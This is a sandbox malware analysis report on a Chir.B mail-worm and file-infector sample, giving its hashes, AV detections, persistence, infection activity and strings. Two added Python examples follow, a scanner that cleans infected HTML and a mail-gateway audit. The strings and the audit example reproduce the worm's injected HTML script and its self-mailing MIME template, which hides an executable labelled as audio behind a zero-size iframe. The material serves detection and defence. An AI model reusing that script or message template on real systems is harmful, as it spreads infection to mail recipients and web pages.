Analysis Date: 2015-05-11 15:54:02
MD5: d6980a5ca9d124f6cd0fe4381111ec2d
SHA1: db46bc1470d695bb1f240a82b573e5aa6c4e4b6e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text:  md5: 4d45cea78f3ab9f4fead024bd33ce5a1  sha1: 4f574f1ea1198062053208332d2fbfd95fb1563d  size: 59392
Section .rdata: md5: b6f626c36f35902475f8149097675376  sha1: 23de5ae8c94087d3d33b45310aba913eba34d067  size: 20992
Section .data:  md5: e6d38ab08a9fe9cbad2d493ca324a0c0  sha1: 41675827a2fa71ab58afa301fe7a2dde3c720ca4  size: 15360
Section .rsrc:  md5: 368984655474c48ed5f22798ec05c489  sha1: 950d704675e44330310ebb998518e4d608c82a76  size: 193532
Timestamp: 2013-04-14 15:26:01
PDB path: c:\winter\Set\Bottom\Up\value\wild\industry\Support\nearcare.pdb
Packer: Armadillo v4.x (signature-based identification; the runtime-error strings in the Strings section are those of a standard Visual C++ CRT, so treat this label as unconfirmed)
PEhash: 46049fdc00b58e37bd43064f11a993a2e9e683c0
IMPhash: b2498eed3c3aa5befc085379b8319a74
AV Ad-Aware: Trojan.Gamarue.AP
AV Alwil (avast): Oncer:Win32:Oncer
AV Arcabit (arcavir): Trojan.Gamarue.AP
AV Authentium: W32/Thecid.B@mm
AV Avira (antivir): W32/Chir.B
AV BitDefender: Trojan.Gamarue.AP
AV BullGuard: Trojan.Gamarue.AP
AV CA (E-Trust Ino): Win32/Chir.B
AV CAT (quickheal): W32.Runouce.B
AV ClamAV: WIN.Worm.Brontok
AV Dr. Web: BackDoor.Andromeda.178
AV Emsisoft: Trojan.Gamarue.AP
AV Eset (nod32): Win32/Chir.B virus
AV Fortinet: W32/Chir.B@mm
AV Frisk (f-prot): W32/Thecid.B@mm
AV F-Secure: Trojan.Gamarue.AP
AV Grisoft (avg): Win32/Chir.B@mm
AV Ikarus: Trojan-Downloader.Win32.Andromeda
AV K7: EmailWorm ( 00176e371 )
AV Kaspersky: Email-Worm.Win32.Runouce.b
AV MalwareBytes: Trojan.Downloader
AV Mcafee: W32/Chir.b@MM
AV Microsoft Security Essentials: Virus:Win32/Chir.B@mm
AV MicroWorld (escan): Trojan.Gamarue.AP
AV Padvish: Downloader.Win32.Gamarue.AA
AV Rising: Worm.ChineseHacker-2.b
AV Sophos: W32/Chir-B
AV Symantec: W32.Chir.B@mm
AV Trend Micro: PE_Chir.B
AV Twister: Trojan.6168@1300C3@18000.mg
AV VirusBlokAda (vba32): Virus.Win32.Chur.A

The engines split between two families. Chir.B (named Runouce, Thecid or ChineseHacker-2 by some vendors) is the one the runtime data supports: runouce.exe written to system32, the Run\Runonce value, the ChineseHacker-2 mutex and the btamail.net.cn SMTP templates in the Strings section are all Chir.B indicators. The Gamarue/Andromeda names from the other engines, together with the 2013 build timestamp, the nearcare.pdb path and the Visual C++ CRT strings, are consistent with a separate host executable that Chir.B's file-infector component has infected; the sample's own behaviour in Runtime Details (opening dozens of existing .exe and .htm files for writing) matches that infector. Treat the two families as separate artifacts when deriving indicators from this report.

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runonce ➝ C:\WINDOWS\system32\runouce.exe
  Raw value data as logged (the string continues past its NUL terminator, so RegSetValueExA was given a length larger than the path and leftover stack contents went into the registry; a SYSTEMTIME for 2015-05-11 is recognisable right after the terminator. The effective REG_SZ value is the path above):
  C:\WINDOWS\system32\runouce.exe\\x00^\\xb9\\x10\\x00\\x01\\x00\\x0b\\x00\\x00\\x00\\x00\\x00\\xdf\\x07\\x05\\x00\\x01\\x00\\x0b\\x00\\x15\\x002\\x00)\\x00\\xaf\\x02\\x01\\x00\\x00\\x00@\\xfe\\x12\\x00\\x00\\x00\\x00\\x00x\\x00\\x00\\x00\\xd0\\xcf\\x90|x\\xfe\\x12\\x00\\x88\\xfe\\x12\\x00\\xd1Wlev]neo]ne\\x1f_ne\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00!^nex\\x00\\x00\\x00\\x03\\x01\\x00\\x00\\x00\\xf0\\xfd\\x7f\\x03\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc4\\x04\\x00\\x00\\x88\\xfe\\x12\\x000\\xae\\x80|t\\xb8me!\\x00\\x00\\x00x\\xff\\x12\\x00\\x98\\xfe\\x12\\x000\\xae\\x80|D\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00t\\x00\\x00\\x00x\\x00\\x00\\x00\\x04\\x07\\x00\\x00Z\\xd0I\\x00
Creates File: C:\WINDOWS\system32\runouce.exe
Creates Process: C:\malware.exe
Creates Mutex: ChineseHacker-2

Process
↳ C:\malware.exe

Creates Mutex: ChineseHacker-2

Process
↳ C:\WINDOWS\system32\runouce.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runonce ➝ C:\WINDOWS\system32\runouce.exe
  Raw value data as logged (same over-long write as in the first process; the effective REG_SZ value is the path above):
  C:\WINDOWS\system32\runouce.exe\\x00^\\xb9\\x10\\x00\\x01\\x00\\x0b\\x00\\x00\\x00\\x00\\x00\\xdf\\x07\\x05\\x00\\x01\\x00\\x0b\\x00\\x15\\x002\\x002\\x00k\\x03\\x01\\x00\\x00\\x00\\x8c\\xcf\\x90|\\\xa1A~p\\x00\\x00\\x00\\xd0\\xcf\\x90|x\\xfe\\x12\\x00\\x88\\xfe\\x12\\x00\\xd1Wlev]neo]ne\\x1f_ne\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00!^nep\\x00\\x00\\x00\\x03\\x01\\x00\\x00\\x00`\\xfd\\x7f\\x03\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x9c\\x00\\x00\\x00\\x88\\xfe\\x12\\x000\\xae\\x80|t\\xb8me!\\x00\\x00\\x00x\\xff\\x12\\x00\\x98\\xfe\\x12\\x000\\xae\\x80|D\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00l\\x00\\x00\\x00p\\x00\\x00\\x000\\x04\\x00\\x00ZZ@\\x00
Creates File: Review02.html
Creates File: license.html
Creates File: isignup.exe
Creates File: Clear Day.htm
Creates File: Review04.html
Creates File: Hanko04.html
Creates File: Technical.htm
Creates File: msmsgs.exe
Creates File: Sign07.html
Creates File: HowTo07.html
Creates File: HowTo00.html
Creates File: Sweets.htm
Creates File: Microsoft Visual C++ 2010 x86 Redistributable Setup_20130508_125854937.html
Creates File: monitor.exe
Creates File: DW20.EXE
Creates File: setup.exe
Creates File: Sign09.html
Creates File: Sunflower.htm
Creates File: Review06.html
Creates File: HowTo06.html
Creates File: AcroRd32.exe
Creates File: runouce.exe
Creates File: readme.eml
Creates File: reader_sl.exe
Creates File: Review21.html
Creates File: Review09.html
Creates File: Review08.html
Creates File: Sign02.html
Creates File: Hanko01.html
Creates File: Hanko.html
Creates File: msimn.exe
Creates File: Review20.html
Creates File: Review01.html
Creates File: wab.exe
Creates File: Hanko02.html
Creates File: Sign13.html
Creates File: wabmig.exe
Creates File: Review17.html
Creates File: Sign05.html
Creates File: malware.exe
Creates File: conf.exe
Creates File: Review22.html
Creates File: Ivy.htm
Creates File: Review14.html
Creates File: Network Blitz.htm
Creates File: icwconn2.exe
Creates File: setup50.exe
Creates File: cb32.exe
Creates File: Review28.html
Creates File: sapisvr.exe
Creates File: Setup.exe
Creates File: icwtutor.exe
Creates File: ReadMe.htm
Creates File: Nature.htm
Creates File: HowTo08.html
Creates File: HowTo04.html
Creates File: Review05.html
Creates File: Fiesta.htm
Creates File: Review12.html
Creates File: Review13.html
Creates File: Sign.html
Creates File: MDACReadme.htm
Creates File: PIPE\wkssvc
Creates File: Forms.html
Creates File: Review11.html
Creates File: Pie Charts.htm
Creates File: iedw.exe
Creates File: AdobeUpdateManager.exe
Creates File: Review.html
Creates File: icwconn1.exe
Creates File: Sign04.html
Creates File: Sign11.html
Creates File: Glacier.htm
Creates File: Sign06.html
Creates File: Forms02.html
Creates File: msnsusii.exe
Creates File: HowTo01.html
Creates File: icwrmind.exe
Creates File: Maize.htm
Creates File: Blank.htm
Creates File: msinfo32.exe
Creates File: DWTRIG20.EXE
Creates File: HowTo05.html
Creates File: moviemk.exe
Creates File: Review07.html
Creates File: Hanko05.html
Creates File: acroaum.exe
Creates File: PIPE\DAV RPC SERVICE
Creates File: netmeet.htm
Creates File: Leaves.htm
Creates File: Review18.html
Creates File: Review16.html
Creates File: Msncli.exe
Creates File: HowTo02.html
Creates File: HowTo.html
Creates File: Review10.html
Creates File: wb32.exe
Creates File: HowTo03.html
Creates File: Digcore.exe
Creates File: inetwiz.exe
Creates File: Hanko03.html
Creates File: Review19.html
Creates File: Citrus Punch.htm
Creates File: picturetasks_ENU.html
Creates File: instmsiw.exe
Creates File: Review23.html
Creates File: AcroRd32Info.exe
Creates File: Forms01.html
Creates File: oemig50.exe
Creates File: Engineering07.html
Creates File: IEXPLORE.EXE
Creates File: Review03.html
  (The sandbox logs file names only. Apart from runouce.exe and readme.eml, these are existing Windows, Help and Program Files executables and HTML pages, so "Creates File" here reflects CreateFileA opens for writing, i.e. the file-infection pass, not new drops. PIPE\wkssvc and PIPE\DAV RPC SERVICE are named pipes touched while the sample enumerates network resources; WNetOpenEnumA and WNetEnumResourceA are in the import strings.)
Creates Process: C:\WINDOWS\system32\runouce.exe
Creates Mutex: ChineseHacker-2

Process
↳ C:\WINDOWS\system32\runouce.exe

Creates Mutex: ChineseHacker-2

Process
↳ C:\WINDOWS\Explorer.EXE

Creates Process: C:\WINDOWS\system32\runouce.exe
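The file list above, read together with two entries in the Strings section (the `window.open("readme.eml", ...)` script and the readme.eml name), shows how the sample spreads through HTML: it writes that script into .htm/.html pages so that opening any of them loads the mail file dropped next to it. The scanner below is an added example, not code from the report or from the sample. The marker script and the readme.eml name are copied from the report's strings; the directory layout, the file contents and the disinfection routine are constructed for this example.

```python
"""
Added example (not part of the sandbox report): find and clean the two
host-side artifacts of the HTML infection the report records. The marker
script and the readme.eml name are copied from the report's strings; the
sample directory tree and file contents below are constructed.
"""
import os
import tempfile
from pathlib import Path

# Script the sample writes into .htm/.html files, verbatim from the report's strings.
HTML_MARKER = ('<html><script language="JavaScript">'
               'window.open("readme.eml", null,"resizable=no,top=6000,left=6000")'
               '</script></html>').encode("ascii")
EML_NAME = "readme.eml"      # mail file dropped next to the infected page
HTML_EXT = {".htm", ".html"}
MAX_SIZE = 16 * 1024 * 1024  # skip anything larger; the targets are small help pages


def scan_tree(root):
    """Walk root and return {'html': [infected pages], 'eml': [mail files]}, sorted."""
    findings = {"html": [], "eml": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if name.lower() == EML_NAME:
                findings["eml"].append(str(path))
            elif path.suffix.lower() in HTML_EXT and _has_marker(path):
                findings["html"].append(str(path))
    for key in findings:
        findings[key].sort()
    return findings


def _has_marker(path):
    """True if the page contains the injected script anywhere in its bytes."""
    try:
        if path.stat().st_size > MAX_SIZE:
            return False
        return HTML_MARKER in path.read_bytes()
    except OSError:
        return False


def disinfect_html(path):
    """Remove every copy of the marker from the page; return True if any was removed."""
    path = Path(path)
    data = path.read_bytes()
    if HTML_MARKER not in data:
        return False
    path.write_bytes(data.replace(HTML_MARKER, b""))
    return True


def build_sample_tree(root):
    """Construct a tree with one clean page, one infected page and a dropped mail file."""
    root = Path(root)
    (root / "Help").mkdir(parents=True, exist_ok=True)
    clean = b"<html><body>constructed clean page</body></html>\r\n"
    (root / "Help" / "ReadMe.htm").write_bytes(clean)
    (root / "Help" / "Review02.html").write_bytes(clean + HTML_MARKER)
    (root / "Help" / EML_NAME).write_bytes(b"Subject: constructed\r\n\r\nbody\r\n")
    return root


def run_demo():
    """Scan, clean and rescan a constructed tree; return all three results."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        before = scan_tree(tmp)
        cleaned = [disinfect_html(p) for p in before["html"]]
        after = scan_tree(tmp)
    return {"before": before, "cleaned": cleaned, "after": after}


if __name__ == "__main__":
    for stage, result in run_demo().items():
        print(stage, result)
```

Disinfection only strips the injected script; the readme.eml files are left for you to collect as evidence (they are the outbound mail body, useful for confirming the SMTP templates in the Strings section) and delete afterwards. Executable infection is not covered here because the report gives no marker for the PE side; rely on the AV signatures for that.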

Network Details:


Strings
.
.
.
.
-e-
. 
\
CC.
 
.
D.
.

%2Tb
=4|J
                                 H
         (((((                  H
?H=a
h/GIAXc
         h((((                  H
h%%k
P5j=
,pcO
$S8C
^wZb
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0@ H(2
0SSSSS
0/$ $Z
1yEE$$
[2EwE"
33EE33/
3EEEEE
%%$3$M
3N3	EE
3UEE$$M
&3Z3;3
4EE33g
-4zbT|
}~%8%<
8VVVVV
a?33$$
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
ADVAPI32.DLL
An application has made an attempt to load the C runtime library incorrectly.
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD`
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<at9<rt,<wt
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
.?AVCHandleMap@@
BC"&e&
B Od(l
--#BOUNDARY#
btamail.net.cn
C3?uTu
ChineseHacker-2
CloseHandle
closesocket
CoCreateInstance
CoInitialize
connect
CONOUT$
Content-id: THE-CID
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable
Content-Type: audio/x-wav; name="pp.exe"
Content-type: multipart/mixed; boundary="#BOUNDARY#"
Content-Type: text/html
CorExitProcess
CoUninitialize
CreateFileA
CreateKernelThread
CreateMutexA
CreateRemoteThread
CreateThread
- CRT not initialized
c:\winter\Set\Bottom\Up\value\wild\industry\Support\nearcare.pdb
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
DgCYfB
=.doct
DOMAIN error
|Em/vE%%
En2GD 
EncodePointer
EnterCriticalSection
Euuuu3M
=.exetS=.scrtL=.htmt
ExitProcess
February
F\= fA
FindClose
FindFirstFileA
FindNextFileA
FindWindowA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
FROM: %s@yahoo.com
FVh0	A
GetACP
GetActiveWindow
GetCommandLineA
GetComputerNameA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDriveTypeA
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
gethostbyname
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemDirectoryA
GetSystemTime
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersionExA
GetWindow
GetWindowThreadProcessId
guide six
GWh0	A
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
HELO btamail.net.cn
HH:mm:ss
<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
=htmlt
.idata
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
JanFebMarAprMayJunJulAugSepOctNovDec
January
jF<-uH
j`hhFA
j@j ^V
kernel32.dll
KERNEL32.dll
KERNEL32.DLL
_lclose
LCMapStringA
LCMapStringW
_lcreat
LeaveCriticalSection
_llseek
LoadLibraryA
_lopen
_lread
_lwrite
MAIL FROM: imissyou@btamail.net.cn
MessageBoxA
mh3t3i
Microsoft Visual C++ Runtime Library
MIME-Version: 1.0
.mixcrt
MM/dd/yy
Monday
MPR.DLL
mscoree.dll
MultiByteToWideChar
Net Send * My god! Some one killed ChineseHacker-2 Monitor
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
.nyGex
October
$O$$$EE
ole32.dll
OpenProcess
Please contact the application's support team for more information.
PPPPPPPP
PrepareTape
Program: 
<program name unknown>
- pure virtual function call
QueryPerformanceCounter
RCPT TO: %s
`.rdata
ReadFile
readme.eml
REEEE{S
RegisterServiceProcess
RegNotifyChangeKeyValue
RegOpenKeyA
RegQueryValueExA
RegSetValueExA
.reloc
RnnCW_
RSDSKG
RtlUnwind
Runonce
\runouce.exe
runtime error 
Runtime Error!
Saturday
SendMessageA
September
SetCurrentDirectoryA
SetEndOfFile
SetFileAttributesA
SetFilePointer
SetFileTime
SetHandleCount
SetLastError
SetStdHandle
SetUnhandledExceptionFilter
SING error
socket
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SrdF_?
^SSSSS
SUBJECT: %s is comming!
Sunday
SunMonTueWedThuFriSat
t$$%%]
t^9(uZ
tD9(u@
TerminateProcess
TerminateThread
tGHt.Ht&
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
This program must be run under Win32
Thursday
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
@to@e@
TO: %s
t#SSUP
_tt333
ttECEa
t$<"u	3
Tuesday
;t$,v-
t$$VSS
t+WWVPV
tX%%EE
U[$=$33
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UNICODE
UQPXY]Y[
URPQQh(\@
USER32.DLL
UTF-16LE
uu$$;$Q$
uuuDt%
V4Xf=`
VirtualAlloc
VirtualAllocEx
VirtualFree
VirtualProtect
v	N+D$
w3>3uu
w6QjDWS
=.wabt!=.adct%=r.dbt
WaitForSingleObject
Wednesday
WideCharToMultiByte
WinExec
    =winntv=windto
*'W`K?
WNetCloseEnum
WNetEnumResourceA
WNetOpenEnumA
<": %Wo
WriteConsoleA
WriteConsoleW
WriteFile
WriteProcessMemory
WSACleanup
WSAStartup
WSOCK32.DLL
wsprintfA
=.xlst
youkind
>=Yt/j
_^][YY
YYu-9D$
YYuTVWh*
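The SMTP and MIME strings above (HELO btamail.net.cn, MAIL FROM: imissyou@btamail.net.cn, RCPT TO: %s, FROM: %s@yahoo.com, TO: %s, SUBJECT: %s is comming!, the multipart/mixed template with boundary #BOUNDARY#, a quoted-printable text/html part whose zero-size iframe points at cid:THE-CID, and a base64 part labelled audio/x-wav but named pp.exe with Content-id THE-CID) describe the mail the sample sends with its own socket code (socket, connect, gethostbyname from WSOCK32.DLL), so no local mail client is involved. Labelling an executable as audio and referencing it from a hidden iframe is the technique mail worms of this family used against the MS01-020 MIME-handling flaw in old mail clients. The code below is an added example, not code from the report or from the sample: it reconstructs the message from those templates and runs a gateway-style check that flags the executable-as-audio mismatch, the hidden cid: iframe, and the chain between them. The sender name, recipient, attachment bytes and the extension list are constructed for this example.

```python
"""
Added example (not code from the report or from the sample it describes):
rebuild the mail implied by the Strings section and audit it the way a mail
gateway should. Header and body templates are copied from the report; the
sender name, recipient, attachment bytes and EXEC_EXT list are constructed.
"""
import base64
import email
import re
from email import policy

BOUNDARY = "#BOUNDARY#"

# Constructed list: extensions that must never arrive under a non-application media type.
EXEC_EXT = re.compile(r"\.(exe|scr|pif|com|bat|cmd)$", re.I)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
CID_RE = re.compile(r"""src\s*=\s*["']?cid:([^\s"'>]+)""", re.I)
ZERO_RE = re.compile(r"""\b(?:height|width)\s*=\s*["']?0\b""", re.I)


def build_worm_message(sender_user, recipient, exe_bytes):
    """Assemble the message from the report's templates with the %s slots filled in."""
    html = ('<html><HEAD></HEAD><body bgColor=3D#ffffff>'
            '<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>')
    lines = [
        f"FROM: {sender_user}@yahoo.com",
        f"TO: {recipient}",
        f"SUBJECT: {sender_user} is comming!",
        "MIME-Version: 1.0",
        f'Content-type: multipart/mixed; boundary="{BOUNDARY}"',
        "",
        f"--{BOUNDARY}",
        "Content-Type: text/html",
        "Content-Transfer-Encoding: quoted-printable",
        "",
        html,
        "",
        f"--{BOUNDARY}",
        'Content-Type: audio/x-wav; name="pp.exe"',
        "Content-Transfer-Encoding: base64",
        "Content-id: THE-CID",
        "",
        base64.b64encode(exe_bytes).decode("ascii"),
        f"--{BOUNDARY}--",
        "",
    ]
    return "\r\n".join(lines)


def audit_message(raw):
    """Return (kind, detail) findings for the two tricks the template relies on."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    mislabelled = {}   # content-id -> filename of parts flagged as executables
    hidden_refs = []   # content-ids referenced from zero-size iframes in HTML parts
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        fname = part.get_filename() or ""          # falls back to Content-Type name=
        cid = (part.get("Content-ID") or "").strip("<>")
        if EXEC_EXT.search(fname) and not ctype.startswith("application/"):
            findings.append(("mislabelled_executable", f"{fname} sent as {ctype}"))
            if cid:
                mislabelled[cid] = fname
        if ctype == "text/html":
            body = part.get_content()              # quoted-printable undone here
            for tag in IFRAME_RE.findall(body):
                ref = CID_RE.search(tag)
                if ref and ZERO_RE.search(tag):
                    hidden_refs.append(ref.group(1))
                    findings.append(("hidden_cid_iframe", ref.group(1)))
    # The HTML part precedes the attachment, so resolve references after the walk.
    for cid in hidden_refs:
        if cid in mislabelled:
            findings.append(("auto_run_chain", f"iframe cid:{cid} -> {mislabelled[cid]}"))
    return findings


if __name__ == "__main__":
    sample = build_worm_message("alice", "bob@example.invalid", b"MZ" + b"\x00" * 62)
    for kind, detail in audit_message(sample):
        print(kind, detail)
```

The audit deliberately keys on the declared filename and media type, not on the decoded attachment: a gateway sees the headers before the body, and the mismatch alone is enough to quarantine. Checking the decoded payload for an MZ header is a cheap extra step if you want a second signal.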